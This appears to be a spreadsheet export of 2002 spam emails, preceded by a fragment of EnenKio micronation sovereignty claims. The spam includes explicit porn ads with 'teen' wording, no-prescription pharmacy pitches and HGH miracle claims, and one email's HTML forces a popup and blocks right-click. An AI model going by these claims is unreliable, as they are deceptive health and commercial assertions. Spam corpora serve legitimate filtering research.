acknowledged the\nillegality a hundred years earlier of the establishment by Americans of\nthe Republic of Hawai'i. King Murjel Hermios, who is paramount chief of\nan archipelago in the northern Marshalls, declared Wake Island's\nindependence in 1987. The Marshalls recognized this claim shortly after\nthe nation gained its independence. In return for his services as\nMinister Plenipotentiary in the United States, Hermios granted American\nbusinessman Robert Moore land on Taongi Atoll in the northern Marshalls,\nwhich Moore has declared the Dominion of Melchizedek."\nComment: With all candor, I cannot figure how such straight forward\nfacts such as we have presented to the public and over the Internet\nsince 1994 could have possibly been construed into the above referenced\ntext. While I am pleased to find you have apparently taken a very\nserious interest (unless your site is intended as some twisted joke,\nwhich I am assuming is not the case) in the history of the Kingdom of\nEnenKio, I am aghast at how distorted, erroneous and misleading your\nsummary is. As a consequence of my service to His Majesty King Remios\nand the people of EnenKio, I will respectfully offer the following line\nby line correction. For your convenience, your text will be set off\n(with "**") in color:\n**In 1898, the United States annexed Wake Island, in the Marshall\nIslands of the western Pacific.**\nCorrection: In 1898, the United States invaded Wake Island, the\nnorthernmost atoll -- actually named Eneen-Kio centuries before western\nexplorers arrived -- of the Ratak chain of Marshall Islands in\nMicronesia and the Central North Pacific Ocean.\nThe Author responds: "Rest assured that I did not mean to downplay the\nrole of violence in the American acquisition of the territory."\n**After the Marshalls became a U.S. Trust Territory, the traditional\nchiefs of the area agitated for recognition that Wake Island was a part\nof the Marianas chain, and pressed their historical claims to the atoll,\ncalled Enenkio locally.**\nCorrection: Following W.W.II, the Trust Territories of the Pacific,\nwhich included the Marshall Islands, was placed under administration of\nthe United States by the United Nations. While Eneen-Kio was well\nestablished as one of the Marshalls, the U.S. only knew it as Wake and,\nhaving lost many U.S. lives there in 1941 at the hands of Japanese\ninvaders, kept control of it. In 1993, the Paramount Chief of the Ratak\natolls pressed his clan's historical and lawful claim to the 3 islands\nof Eneen-Kio Atoll.\nThe Author responds: "I don't see much conflict between the two versions\nhere."\n**The U.S. government has consistently ignored these claims.**\nCorrection: The U.S. government has consistently ignored claims from the\nMarshall Islands government, which failed to exert a claim during its\nmove to independence in 1979, and from the former traditional\nlandowners, including Iroijlaplap Murjel Hermios.\nThe Author responds: "I will note this."\n**The protests took a sharper turn after the U.S. Congress in 1993\nacknowledged the illegality a hundred years earlier of the establishment\nby Americans of the Republic of Hawai'i.**\nCorrection: The Eneen-Kio claims gained some new momentum after\nprecedents were set by the U.S. Congress, when in 1993 they acknowledged\nthe illegality of the 1893 overthrow of the Monarch of the Kingdom of\nHawai'i by a group of American businessmen and U.S. Marines, and in the\nfollowing year returned the island of Kaho'olawe to the Hawaiian People.\n**King Murjel Hermios, who is paramount chief of an archipelago in the\nnorthern Marshalls, declared Wake Island's independence in 1987.**\nCorrection: King Murjel Hermios, who was Paramount Chief until his death\nin December 1998, declared the sovereign state of EnenKio in 1994,\nwhereupon the people chose him as their King over Eneen-Kio Atoll,\nratified the Constitution and established government as a limited\nconstitutional monarchy.\nThe Author responds: "I will make the necessary corrections here."\n**The Marshalls recognized this claim shortly after the nation gained\nits independence. In return for his services as Minister Plenipotentiary\nin the United States, Hermios granted American businessman Robert Moore\nland on Taongi Atoll in the northern Marshalls, which Moore has declared\nthe Dominion of Melchizedek.**\nCorrection: After the death of the First Monarch, his brother Remios\nsucceeded to the throne as Second Monarch and rules along with his\nbrother, Crown Prince Lobadreo, over the Kingdom of EnenKio today.\nTo continue the commentary: The parts left out were either wrong or have\nnothing to do with the history of the Kingdom of EnenKio itself. Since\nHM King Remios also succeeded to Iroijlaplap of the northern Ratak\natolls of the Marshall Islands, he also has responsibilities over 10\natolls, 2 islands and over 300 atoll islets. But that is another story,\nwhich has nothing directly to do with the Kingdom of EnenKio. I have\noffered this treatise in hopes that you will find the time to correct\nyour site per my suggestions. Please feel free to contact me or view our\npages at the address above. Thank you in advance for your attention and\ninterest in this matter.\nThe Author responds: "I imagine that you are asserting here that Moore's\nMelchizedek project (which can be located on the web through the Sources\n&amp; Bibliography section of my web page) is non-existent. Be assured I\nwill look further into\par this. Thank you again for your response,\nCaptain Rydell. I should be posting a revised version of the page in the\nnext week or so." (June 7, 1999)\nSKIP TO NEXT FILE =A0TOP OF PAGE\nJune 1, 1999: News Release\nPart One Background:\nOn May 21, 1999, the Ministry of Foreign Affairs and Trade of the\nRepublic of the Marshall Islands posted a "press release" on the\nInternet at: [URL]http://www.yokwe.net[/URL],0\cf0\n(discontinued as of 12/1/00). The author, "Mr. Joseph Biglar,\nUndersecretary", is not known to us, has not heretofore communicated\nwith the government of the Kingdom of EnenKio, nor with its Monarch, His\nMajesty King Remios, at any time and has no knowledge of any policies or\nstate activities of EnenKio. There is no valid reason to assume that the\nsaid "press release" is indeed an official document.\nThe Republic of the Marshall Islands has perfect knowledge that\nrepresentatives of the Kingdom of EnenKio, headed by His Majesty King\nRemios, on the basis of his proper and lawful authority, have the right\nand obligation to speak in support of the interests of certain persons,\nmany of whom happen to be Marshallese nationals residing in the Marshall\nIslands.\nResponse to so-called "Press Release":\nThis unprovoked attack upon His Majesty King Remios, Monarch of the\nKingdom of EnenKio, by the Ministry of Foreign Affairs and Trade of the\nRepublic of the Marshall Islands is wholly false. It is also\nunjustifiably inflammatory and amounts to little more than an\nunquestionable confirmation of the predilection for infringement upon\nMarshallese sovereign rights exercised by the current administration of\nthe Republic of the Marshall Islands, which has been confirmed by the\nU.S. State Department. (See: Human Rights Report)\nThis public posting shall serve as constructive notice to the Marshall\nIslands Government that any attempt to interfere in the business of His\nMajesty King Remios, Iroijlaplap of the Northern Ratak atolls of the\nMarshall Islands, or any acts, decisions, mandates, announcements or\ndirectives thereby, shall be met with definitive responses equal to the\ndegrees of contravention.\nThe RMI is unequivocally cognizant that the Kingdom of EnenKio:\n=C2=BB =C2=BB exists as a sovereign state as defined by the Montevideo\nConvention (1933).\n=C2=BB =C2=BB was conceived as a separate independent state by its\nsovereign,\nIroijlaplap Murjel Hermios, in 1987.\n=C2=BB =C2=BB was established by way of a public authority, the\nConstitution\nof the Kingdom of EnenKio Atoll, ratified in 1994 by its people.\n=C2=BB =C2=BB has negotiated diplomatic and trade treaties with many\nother\nstates, including the Dominion of Melchizedek\n=C2=BB =C2=BB has asserted political and territorial jurisdiction over\nislands\nand seas which lie entirely outside and well beyond the area defined as\n- now quoting Mr. Biglar's statement - "RMI geographical and political\nboundaries."\n=C2=BB =C2=BB exercises authorities founded upon prehistoric traditional\nand\nmatriarchal ancestral rights and titles bestowed, under the sacred\nheritage of Marshallese customary law (reinforced by the RMI\nConstitution), upon the acknowledged Iroijlaplaps of the Northern Ratak\natolls, whose authority is certainly not subject to scrutiny by Ministry\nof Foreign Affairs and Trade of the Republic of the Marshall Islands.\n=C2=BB =C2=BB has not subjugated, assigned or encumbered any of its\npolitical\njurisdiction within its defined territorial boundaries of islands and\nseas of Eneen-Kio Atoll to the government or people of the Dominion of\nMelchizedek or to any other entity, including the Republic of the\nMarshall Islands.\nMr. Biglar is unequivocally cognizant that the Republic of the Marshall\nIslands:\n=C2=BB =C2=BB also exists as a sovereign state, defined by the\nMontevideo\nConvention (1933).\n=C2=BB =C2=BB was conceived as a separate state by (UN) foreign\ngovernments,\nwhich included the United States, China and the USSR.\n=C2=BB =C2=BB was also established under a public authority, the\nConstitution\nof the Marshall Islands, ratified in 1979 by its people.\n=C2=BB =C2=BB has no relations with EnenKio that allows RMI knowledge of\nanything that is not also public information and no such public\ninformation respecting relations with the Dominion of Melchizedek has\never been disseminated to harm the RMI to be condemned by Mr. Biglar.\n=C2=BB =C2=BB has no political or territorial jurisdiction over the\nislands\nand seas of Eneen-Kio Atoll, which was not incorporated into the RMI in\n1979, nor subsequently incorporated by any act, law or mandate of any\npresent or former Iroijlaplap or Monarch thereof and any statement to\nthe contrary is fraudulent, as in the instant matter.\n=C2=BB =C2=BB exercises authorities founded upon the RMI Constitution,\nwhich\ndoes not incorporate nor authorize political jurisdiction over\nterritorial boundaries that include the islands or seas of Eneen-Kio\nAtoll and any statement to the contrary is fraudulent, as in the instant\nmatter.\n=C2=BB =C2=BB has refused to acknowledge the leadership of the Kingdom\nof\nEnenKio in their every attempt to get the RMI government to mitigate the\nsuffering of people residing in the Ratak atolls, under jurisdiction of\nIroijlaplap Hermios, and the RMI has rejected every suggestion to\ncoordinate prospective relief efforts through the said Iroijlaplap\nHermios.\nThe Ministry of Foreign Affairs and Trade of the Republic of the\nMarshall Islands is steadfastly advised that any unilateral statements\nor actions by the administration of the Republic of the Marshall Islands\nwhich purport, seek or serve to diminish or question the credibility,\nexistence or authority of the government of the Kingdom of EnenKio in\nthe conduct of its affairs of state, without legitimate authentication\nby a court of competent jurisdiction, are hereafter to be taken as\ndeliberate acts of aggression upon the Monarch of the Kingdom, His\nMajesty King Remios, as Head of State, the government of the Kingdom of\nEnenKio and its people, and will be countered with appropriate\nresponsive measures.\nFurthermore, in light of the Ministry of Foreign Affairs and Trade of\nthe Republic of the Marshall Islands announcement concerning the Kingdom\nof EnenKio, your attention is respectfully directed to the following\nstatement in the Preamble of the Constitution of the Marshall Islands,\nthen you decide for yourself:\n"With this Constitution, we affirm our desire and right to live in peace\nand harmony, subscribing to the principles of democracy, sharing the\naspirations of all other peoples for a free and peaceful world, and\nstriving to do all we can to assist in achieving this goal."\nOn behalf of His Majesty King Remios, we, administrators of the Kingdom\nof EnenKio, have wholeheartedly agreed to pursue the same goal for a\nfree and peaceful world and have made no effort to the contrary.\n(See also: Report on RMI Mismanagement)\nSKIP TO NEXT FILE =A0TOP OF PAGE\nNews Release, Part Two, June 1, 1999\nPart Two Background:\nThe International Narcotics Control Strategy Report, 1998 (click on\nreference # 2 below) released by the Bureau for International Narcotics\nand Law Enforcement Affairs, U.S. Department of State, Washington DC,\nFebruary 1999, states as follows:\n"Where Are OFCs Located?\n[Paragraph 4] Thus, it is now possible for an enterprising jurisdiction\nanywhere in the world to establish itself as an emerging OFC. The newest\nOFCs, e.g., Niue and the Marshall Islands, are now sprouting in remote\nareas of the world, such as the Pacific. Even more "remote" are mere\nfigments of fertile imaginations such as the Dominion of Malchizedek\n(sic) or The Kingdom of Enenkio Atol (sic), both entirely fraudulent in\nintent and practice." [note: OFC =3D Offshore Financial Center]\nResponse:\nThis unprovoked attack upon His Majesty King Remios, Monarch of the\nKingdom of EnenKio, the sovereign state of EnenKio and its noble\ncitizenry by the U.S. Department of State is a reprehensible\ncategorically false challenge of the sovereignty of the Kingdom of\nEnenKio. It is also unjustifiably inflammatory and amounts to an\nunqualified felonious defamation of the international reputation of His\nMajesty King Remios, the government of the Kingdom of EnenKio and organs\nthereof.\nThe unmitigated audacity and arrogance of the United States to attempt\nto link the Kingdom of EnenKio with International Crime, narcotics\ntrafficking, money laundering, tax evasion, international drug cartels,\nterrorists, bank fraud or any other sort of criminal activity, without\neven one microscopic fragment of substantive evidence to corroborate\nsuch deliberately nefarious statements is reprehensible in the least.\nThis public posting shall serve as constructive notice to the United\nStates Government that any attempt to interfere in the business of His\nMajesty King Remios, Iroijlaplap of the Northern Ratak atolls of the\nMarshall Islands, or any acts, decisions, mandates, announcements or\ndirectives thereby, shall be met with definitive responses equal to the\ndegrees of contravention.\nFurthermore, this matter will not be resolved until the President of the\nUnited States issues a formal apology to His Majesty King Remios, along\nwith the government of the Kingdom of EnenKio, and the Congress of the\nUnited States initiates a thorough investigation into the abuses of\npower, subversion of natural rights and illegal occupation by the United\nStates of the islands and seas of Eneen-Kio Atoll. Congressional\nrepresentatives to Hawaii, the nearest State of the United States to\nEneen-Kio Atoll, and those of other states, have repeatedly been advised\nof the foregoing atrocities and conditions and have failed to respond in\nkind. The United States is obligated as the self-assured trustee of\nPacific Island States in Micronesia to respond to the charges of "ethnic\ncleansing" and her responsibility to EnenKio is no less.\nFor further information and links to documents, see:\nEnenKio Documents\n[URL]http://www.state.gov[/URL]\ntml\n[URL]http://www.state.gov[/URL]\nMarch 16, 1999: News Release\nThe impact of the passing on December 10 of His Majesty Murjel Hermios,\nFirst Monarch of the Kingdom of EnenKio, Iroijlaplap of the Northern\nRatak Atolls of the Marshall Islands, beloved husband and father, was\nfelt throughout the society.=C2=A0 Flags were flown at half mast for a\nweek\nin the Marshalls and for a a month at EnenKio Consulates around the\nworld.=C2=A0 His remains were interred in a remote site reserved for the\nhighest ranking chiefs, according to Marshallese custom.\n=C2=A0\nHis Majesty King Remios Hermios\nSecond Monarch of the Kingdom of EnenKio\nHe was succeeded to the throne by his younger brother, Remios, who will\nformally accept the staff of authority as Second Monarch, titular Head\nof State of the Kingdom of EnenKio in ceremonies being planned.=C2=A0\nHis\nMajesty Remios Hermios was a retired educator in the Marshalls and\nmaintains a home in the Ratak Atolls. His successor is designated to be\nhis brot</t>
  </si>
  <si>
    <t>http://www.goldhaven.com http://www.feer.com http://www.yokwe.net http://www.state.gov http://www.state.gov http://www.enenkio.wakeisland.org http://www.enenkio.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5509</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: Oral Sex  &lt;qh@wu-tang.net&gt;\nDate: Thu, 25 Jul 2002 12:14:33 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:14:33 -0700</t>
  </si>
  <si>
    <t>Oral Sex  &lt;qh@wu-tang.net&gt;</t>
  </si>
  <si>
    <t>Fw: Re: Account For Lesbian Teen-Sex  foml</t>
  </si>
  <si>
    <t>################################################\n#                                              #=20\n#     Free Hardcore Porn - VIP Membership      #\n#                                              #=20\n################################################\n\nYOUR INSTANT ACCESS PASSWORD\nLOGIN NAME:   cpunks@minder.net=20\nPASSWORD:     EzKWGy4H\n\nNaughty Live Cam=20\n[URL]http://157.237.128.20[/URL]\n\nTeen Sex Dolls=20\n[URL]http://157.237.128.20[/URL]\n\nPlay House Porn=20\n[URL]http://157.237.128.20[/URL]\n\nWHAT YOU GET FOR FREE:\n=B7 XXX Hardcore Videos=20\n=B7 Live Feeds 24-7=20\n=B7 One on One Chat=20\n=B7 Spy Cams=20\n=B7 Games\n=B7 Daily Teen Sex Pic=20\n=B7 Lesbian Teen-Sex=20\n=B7 Oral Sex=20\n=B7 Big Boobs\n=B7 Voyeur Cams\n=B7 XXX Porn Movies=20\n=B7 Live Fucking=20\n=B7 Cum Shots=20\n=B7 Domination=20\n=B7 Group Sex\n=B7 Pissing Cams\n=B7 Exclusive Centerfolds=20\n=B7 Freaky Sex=20\n=B7 Shower Cams=20\n=B7 Asians=20\n=B7 Erotic Stories\n=B7 Amateur Videos\n=B7 Fantasy Babes=20\n=B7 Adult XXX TV=20\n=B7 Hardcore Mags=20\n=B7 Nude Celebs=20\n=B7 Facials\n=B7 And More..\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nRemoval Instructions:\n\nYou have received this advertisement because you have opted in to receive=\n free adult internet offers and specials through our affiliated websites.=\n If you do not wish to receive further emails or have received the email =\nin error you may opt-out of our database here: [URL]http://157.237.128.20[/URL]\nut. Please allow 24hours for removal.\n\nThis e-mail is sent in compliance with the Information Exchange Promotion=\n and Privacy Protection Act. section 50 marked as 'Advertisement' with va=\nlid 'removal' instruction.\n\nvkhehrhnygrhfgolrckpvffrkrrhipuwo\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http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5478</t>
  </si>
  <si>
    <t>To: yyyy-cv@spamassassin.taint.org\nFrom: Steve Adler &lt;stephen.adler@allexecs.org&gt;\nDate: Thu, 25 Jul 2002 11:29:33 +0800</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:29:33 +0800</t>
  </si>
  <si>
    <t>Steve Adler &lt;stephen.adler@allexecs.org&gt;</t>
  </si>
  <si>
    <t>Summer Job Interviews. . . .</t>
  </si>
  <si>
    <t>------ack1234 Content-Type: multipart/alternative; boundary="----alt_border_1" ------alt_border_1 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Greetings! If you're thinking about a new job, now's the time to aggressively pick up your search. Many people slow their job search donw in summer months when in fact it's the best time to look! Here's why.  Many companies implement a new direction or strategy at the first of the year, resulting in a first of the year hiring surge. By mid year, with results in hand, companies start hiring again to expand on or adjust for the results of their first of the year plans. While employers start hiring, job seekers start slowing their search efforts down. This creates an optimal job seeking environment of more jobs and less competition! To best take advantage of this situation you should give yourself massive exposure by signing up to all the top career sites as soon as possible. Of course it will take a little time, but it's well worth it. The top career sites are visited by 1.5 million employers and recruiters daily - And collectively list millions of jobs. If you want to save 60 hours of research and data entry, try a service called ResumeRabbit.com.  They instantly post your resume to 75 the top career sites at once. You'll find this service at [URL]http://start.resumerabbit.com[/URL] With this service you fill out one simple form in about 15 minutes and you'll be instantly seen on Monster.com, HotJobs.com, Job.com CareerBuilder.com, Dice.com and more! When searching for a new job, it's important to work smart and cover a lot of ground. Today's serious job seeker must take a multi-pronged approach to succeed. This should include networking, reading all the classifieds, posting your resume on all the top career sites and searching job listings on these sites daily. We recommend you try [URL]http://start.resumerabbit.com[/URL] It's a quality service that delivers what it promises. &gt;&gt;From mid November to mid January, the holidays have a "slowing down" effect on hiring. Since the job search process can often be several months, waiting until the end of summer to get started may push your new job off well after the new year.  Now's the optimum time to aggressively mount your search! Sincerely, Steve Adler stephen.adler@allexecs.org ========================================================   The staff of AllExecs.com have years of recruiting experience and may from time to time send you a review of career tips and tools that have helped others in their job search. If you'd rather not receive these reviews go to [URL]http://www.allexecs.com[/URL] ========================================================                                                                                                         ------alt_border_1 Content-Type: text/html; charset="ISO-8859-1" Allexecs.org Greetings! If you're thinking about a new job, now's the time to aggressively pick up your search. Many people slow their job search donw in summer months when in fact it's the best time to look! Here's why.  Many companies implement a new direction or strategy at the first of the year, resulting in a first of the year hiring surge. By mid year, with results in hand, companies start hiring again to expand on or adjust for the results of their first of the year plans. While employers start hiring, job seekers start slowing their search efforts down. This creates an optimal job seeking environment of more jobs and less competition! To best take advantage of this situation you should give yourself massive exposure by signing up to all the top career sites as soon as possible. Of course it will take a little time, but it's well worth it. The top career sites are visited by 1.5 million employers and recruiters daily - And collectively list millions of jobs. If you want to save 60 hours of research and data entry, try a service called ResumeRabbit.com.  They instantly post your resume to 75 the top career sites at once. You'll find this service at [URL]http://start.resumerabbit.com[/URL] With this service you fill out one simple form in about 15 minutes and you'll be instantly seen on Monster.com, HotJobs.com, Job.com CareerBuilder.com, Dice.com and more! When searching for a new job, it's important to work smart and cover a lot of ground. Today's serious job seeker must take a multi-pronged approach to succeed. This should include networking, reading all the classifieds, posting your resume on all the top career sites and searching job listings on these sites daily. We recommend you try [URL]http://start.resumerabbit.com[/URL] It's a quality service that delivers what it promises. &gt;&gt;From mid November to mid January, the holidays have a "slowing down" effect on hiring. Since the job search process can often be several months, waiting until the end of summer to get started may push your new job off well after the new year.  Now's the optimum time to aggressively mount your search! Sincerely, Steve Adler stephen.adler@allexecs.org ======================================================== The staff of AllExecs.com have years of recruiting experience and may from time to time send you a review of career tips and tools that have helped others in their job search. If you'd rather not receive these reviews go to  [URL]http://www.allexecs.com[/URL] ======================================================== ------alt_border_1-- ------ack1234--</t>
  </si>
  <si>
    <t>http://start.resumerabbit.com http://start.resumerabbit.com http://www.allexecs.com http://start.resumerabbit.com http://start.resumerabbit.com http://www.allexecs.com</t>
  </si>
  <si>
    <t>5505</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: Your Order &lt;cp@web.com&gt;\nDate: Thu, 25 Jul 2002 11:15:05 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:15:05 -0700</t>
  </si>
  <si>
    <t>Your Order &lt;cp@web.com&gt;</t>
  </si>
  <si>
    <t>Re: Without a Perscription - VIAGRA / PHENTERMINE / PROPECIA / ZYBAN yotgy</t>
  </si>
  <si>
    <t>Royal Meds _  \nyour online = pharmacy =B7 Click Here_  \n---  \nYour online pharmacy for _**FDA approv= ed**_ drugs through a online\nconsultation.  \nNo more embarrassing doctor visits, we offers confidential ordering onlin= e.  \nTake advantage of some of best prices available on the Internet!  \nWe offer the widest range of drugs available through online ordering. **=\n_Such as:_**  \n|  ![](3D"[URL]http://www.royalmeds.com[/URL]  \n---  \n_**= Less than $7.00 per dose  \n**_**Viagra** Inten= ded for men with erectile dysfunction (ED), it helps most\nmen to get and = keep an erection when they get sexually excited. No need to\ngo through em= barrassing, stressful situation anymore, you can now get Viagra\nfrom the = comfort of your home. **Click Here**  \n|  ![](3D"[URL]http://www.royalmeds.com[/URL]  \n---  \n**Phentermine** Obesity weight loss dr= ug. It enables people to burn more fat\ndoing nothing, stimulating your ne= rvous system. You will feel the\ndifference! It will give you more energy,= you will become more active! It's\nan appetite suppressant, you'll burn f= at easier and eat less. It is a both\nsafe and effective treatment to lose= weight. **Cli= ck Here**  \n|  ![](3D"[URL]http://www.royalmeds.com[/URL]  \n---  \n**Zyban** is the first nicotine-free p= ill that, as part of a comprehensive\nprogram from your health care profes= sional, can help you stop smoking. Its\nprescription medicine available on= ly from your health care professional for\nsmokers 18 and older. **Click Here**  \n|  ![](3D"[URL]http://www.royalmeds.com[/URL]  \n---  \n**PROPECIA** is a medical breakthrough= . The first pill that effectively\ntreats male pattern hair loss on the ve= rtex (at top of head) and anterior\nmid-scalp area. **Click Here**  \n  \n* * *  \n  \n---  \n  \n![](3D"[URL]http://www.royalmeds.com[/URL]\n\n\n\n\n\n\n\n=  \n\n\n\n\n\n&amp;= nbsp;\n\n **Unsubscribe Inf= ormation:**  \nThis email is intended to be a benefit to the recipient. If you would lik= e\nto opt-out and not receive any more marketing information please click = on\nthe following link [URL]http://194.44.46.21[/URL] . You= r address will be\nremoved within 24hrs. We sincerely apologize for any in= convenience.\nvfyxeuedwacdjxriumtvrkybkfketsuq \--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http://www.royalmeds.com http://www.royalmeds.com http://www.royalmeds.com http://www.royalmeds.com http://www.royalmeds.com http://194.44.46.21 http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5497</t>
  </si>
  <si>
    <t>To: felipepunk@hotmail.com, figmo_7@vail.net\nFrom: "felipepunk" &lt;felipepunk@hotmail.com&gt;\nDate: Thu, 25 Jul 2002 11:11:21 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:11:21 -0500</t>
  </si>
  <si>
    <t>"felipepunk" &lt;felipepunk@hotmail.com&gt;</t>
  </si>
  <si>
    <t>felipepunk@hotmail.com, figmo_7@vail.net</t>
  </si>
  <si>
    <t>Want to watch HARDCORE PORN MOVIES ? \n\nOur site is voted the #1 BROADBAND MOVIE SITE ONLINE !\n\nClick this link to WATCH OUR STEAMING CHIX IN ACTION :\n\n[URL]http://www.froggyhost.com[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nTo unsubscribe from our list enter you email here :\n[URL]http://www.froggyhost.com[/URL] \n\n [JK9^":}H&amp;*TG0BK5NKIYs5]\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.froggyhost.com http://www.froggyhost.com http://xent.com</t>
  </si>
  <si>
    <t>5477</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Member_Service@aol.com\nDate: Thu, 25 Jul 2002 11:10:01 +0800</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:10:01 +0800</t>
  </si>
  <si>
    <t>Member_Service@aol.com</t>
  </si>
  <si>
    <t>=?ISO-8859-1?Q?Lose=20fat=2C=20gain=20muscle=20with=20HGH?=</t>
  </si>
  <si>
    <t>=3Chtml=3E=3Cbody onload=3D=22window=2Eopen=28'http=3A=2F=2F202=2E101=\n=2E163=2E34=3A81=2Fultimatehgh=5Frun=2F'=29=22 \nbgColor=3D=22#CCCCCC=22 topmargin=3D1 onMouseOver=3D=22window=2Estatus=\n=3D''=3B return true=22 \noncontextmenu=3D=22return false=22 ondragstart=3D=22return false=22=\n onselectstart=3D=22return false=22=3E\n=3Cdiv align=3D=22center=22=3EHello=2C =5B!To!=5D=3CBR=3E=3CBR=3E=3C=2Fdiv=\n=3E=3Cdiv align=3D=22center=22=3E=3C=2Fdiv=3E=3Cp \nalign=3D=22center=22=3E=3Cb=3E=3Cfont face=3D=22Arial=22 size=3D=224=22=\n=3EHuman Growth Hormone Therapy=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fp=3E\n=3Cp align=3D=22center=22=3E=3Cb=3E=3Cfont face=3D=22Arial=22 size=3D=224=\n=22=3ELose weight while building lean muscle \nmass=3Cbr=3Eand reversing the ravages of aging all at once=2E=3C=2Ffont=3E=\n=3Cfont face=3D=22Arial=22 \nsize=3D=223=22=3E=3Cbr=3E\n=3C=2Ffont=3E=3C=2Fb=3E=3Cfont face=3D=22Arial=22 size=3D=223=22=3E =3Cbr=\n=3ERemarkable discoveries about Human Growth \nHormones =28=3Cb=3EHGH=3C=2Fb=3E=29 =3Cbr=3Eare changing the way we think=\n about aging and weight \nloss=2E=3C=2Ffont=3E=3C=2Fp=3E\n=3Ccenter=3E=3Ctable width=3D=22481=22=3E=3Ctr=3E=3Ctd height=3D=222=22=\n width=3D=22247=22=3E=3Cp align=3D=22left=22=3E=3Cb=3E=3Cfont \nface=3D=22Arial=2C Helvetica=2C sans-serif=22 size=3D=223=22=3ELose Weight=\n=3Cbr=3EBuild Muscle Tone=3Cbr=3EReverse \nAging=3Cbr=3E\nIncreased Libido=3Cbr=3EDuration Of Penile Erection=3Cbr=3E=3C=2Ffont=3E=\n=3C=2Fb=3E=3C=2Fp=3E=3C=2Ftd=3E=3Ctd height=3D=222=22 \nwidth=3D=22222=22=3E=3Cp align=3D=22left=22=3E=3Cb=3E=3Cfont face=3D=\n=22Arial=2C Helvetica=2C sans-serif=22 \nsize=3D=223=22=3EHealthier Bones=3Cbr=3E\nImproved Memory=3Cbr=3EImproved skin=3Cbr=3ENew Hair Growth=3Cbr=3EWrinkle=\n Disappearance \n=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fp=3E=3C=2Ftd=3E=3C=2Ftable=3E=3C=2Fcenter=3E\n=3Cp align=3D=22center=22=3E=3Ca href=3D=22http=3A=2F=2F202=2E101=2E163=\n=2E34=3A81=2Fultimatehgh=5Frun=2F=22=3E=3Cfont face=3D=22Arial=22 \nsize=3D=224=22=3E=3Cb=3EVisit \n  Our Web Site and Learn The Facts =3A Click Here=3C=2Fb=3E=3C=2Ffont=3E=\n=3C=2Fa=3E=3Cbr=3E\n  =3Cbr=3E\n  =3Ca href=3D=22http=3A=2F=2F64=2E123=2E160=2E91=3A81=2Fultimatehgh=5Frun=\n=2F=22=3E=3Cfont size=3D=224=22=3E=3Cb=3EOR \n  Here=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fa=3E=3C=2Fp=3E\n=3Cdiv align=3D=22center=22=3E=3Cbr=3E\n  You are receiving this email as a subscr=3C!----=3Eiber=3Cbr=3E\n  to the Opt=3C!----=3E-In Ameri=3C!----=3Eca Mailin=3C!----=3Eg Lis=\n=3C!----=3Et=2E =3Cbr=3E\nTo remo=3C!----=3Eve your=3C!----=3Eself from all related mailli=3C!--me--=\n=3Ests=2C=3Cbr=3Ejust =3Ca \nhref=3D=22http=3A=2F=2F64=2E123=2E160=2E91=3A81=2Fultimatehgh=5Frun=\n=2Fremove=2Ephp=3Fuserid=3D=5B!To!=5D=22=3EClick \nHere=3C=2Fa=3E=3C=2Fdiv=3E=3C=2Fbody=3E=3C=2Fhtml=3E\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5496</t>
  </si>
  <si>
    <t>To: &lt;cyphipps@hotmail.com&gt;\nFrom: alancrooks@lt08.yourip21.com\nDate: Thu, 25 Jul 2002 10:51:57 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:51:57 -0500</t>
  </si>
  <si>
    <t>alancrooks@lt08.yourip21.com</t>
  </si>
  <si>
    <t>&lt;cyphipps@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Lowest Rates Available.                    gjannsxrwg</t>
  </si>
  <si>
    <t>When America's top companies compete for your business, you win.\n\n[URL]http://four87.six86.com[/URL]\n\nTake a moment to let us show you that we are here to save you money and address your concerns\nwith absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's\ntop companies.\n\n-Life Insurance 70% off.\n-Medical Insurance 60% off.\n-Mortgage rates that save you thousands.\n-New home loans.\n-Refinance or consolidate high interest credit card debt into a low interest mortgage.\n-Get the best prices from the nation's leading health insurance companies.\n_Dental Insurance at the lowest rate available.\n\n\nWe will soon be offering  Auto Insurance quotes as well.\n\n\n\n[URL]http://four87.six86.com[/URL]\n\n\n\n"...was able to get 3 great offers in\nless than 24 hours." -Jennifer C\n\n"Met all my needs... being able to search\nfor loans in a way that puts me in control." -Robert T.\n\n"..it was easy, effortless...!"-Susan A.\n\n \n\nClick here to delete your address from future updates.\n[URL]http://four87.six86.com[/URL]\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http://four87.six86.com http://four87.six86.com http://four87.six86.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5495</t>
  </si>
  <si>
    <t>To: cpuma@earthlink.net, cpumatt@trib.com, cpun@rocketmail.com,\nFrom: Pamela@Blinkese.com ()\nDate: Thu, 25 Jul 2002 10:49:57 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:49:57 -0400</t>
  </si>
  <si>
    <t>Pamela@Blinkese.com ()</t>
  </si>
  <si>
    <t>cpuma@earthlink.net, cpumatt@trib.com, cpun@rocketmail.com,</t>
  </si>
  <si>
    <t>Hey wassup, Remember me ;)</t>
  </si>
  <si>
